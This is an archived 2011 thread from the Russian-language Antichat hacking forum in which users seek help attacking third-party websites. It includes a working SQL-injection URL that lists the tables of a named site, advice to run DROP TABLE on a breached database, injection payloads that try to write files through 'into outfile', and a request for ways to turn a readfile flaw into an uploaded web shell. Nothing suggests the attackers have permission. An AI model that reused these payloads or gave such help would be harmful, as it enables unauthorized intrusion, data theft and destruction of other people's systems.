ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
11.06.2011, 20:04
|
|
Guest
Сообщений: n/a
Провел на форуме:
1010
Репутация:
0
|
|
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...
|
|
|
|
11.06.2011, 20:06
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от MrGergez
MrGergez said:
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...
DROP TABLE "table_name"
только зачем!?
|
|
|
11.06.2011, 20:12
|
|
Guest
Сообщений: n/a
Провел на форуме:
1010
Репутация:
0
|
|
Сообщение от d1v
d1v said:
DROP TABLE "table_name"
только зачем!?
Тренировка и практика еще никому не мешали
|
|
|
|
11.06.2011, 20:13
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от MrGergez
MrGergez said:
Тренировка и практика еще никому не мешали
тренируйся на кошках (с)
|
|
|
|
11.06.2011, 20:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
1010
Репутация:
0
|
|
Но если не трудно можете показать на примере вот здесь список таблиц
http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_conc at(table_name+separator+0x3a)+from+information_sch ema.tables+where+table_schema=0x73776173696e676572--
|
|
|
|
11.06.2011, 20:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
1010
Репутация:
0
|
|
Сообщение от d1v
d1v said:
DROP TABLE "table_name"
А меня склоняло к мысли о TRUNCATE
|
|
|
|
12.06.2011, 00:05
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?
Интересует заливка шелла.
Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.
Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.
Есть доступ к phpinfo и некоторым файлам конфигурации.
Что можете подсказать?
|
|
|
|
12.06.2011, 00:10
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014
Репутация:
8
|
|
Сообщение от SecondLife
SecondLife said:
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?
Интересует заливка шелла.
Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.
Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.
Есть доступ к phpinfo и некоторым файлам конфигурации.
Что можете подсказать?
Ты линк выложи, а мы посмотрим.
|
|
|
|
12.06.2011, 00:32
|
|
Guest
Сообщений: n/a
Провел на форуме:
5997
Репутация:
21
|
|
Сообщение от FlaktW
FlaktW said:
Ты линк выложи
Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.
|
|
|
|
12.06.2011, 11:53
|
|
Новичок
Регистрация: 19.05.2010
Сообщений: 6
Провел на форуме:
7830
Репутация:
4
|
|
Подскажите любой рабочий способ узнать путь к файлу?
в чем тут ошибка?
?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
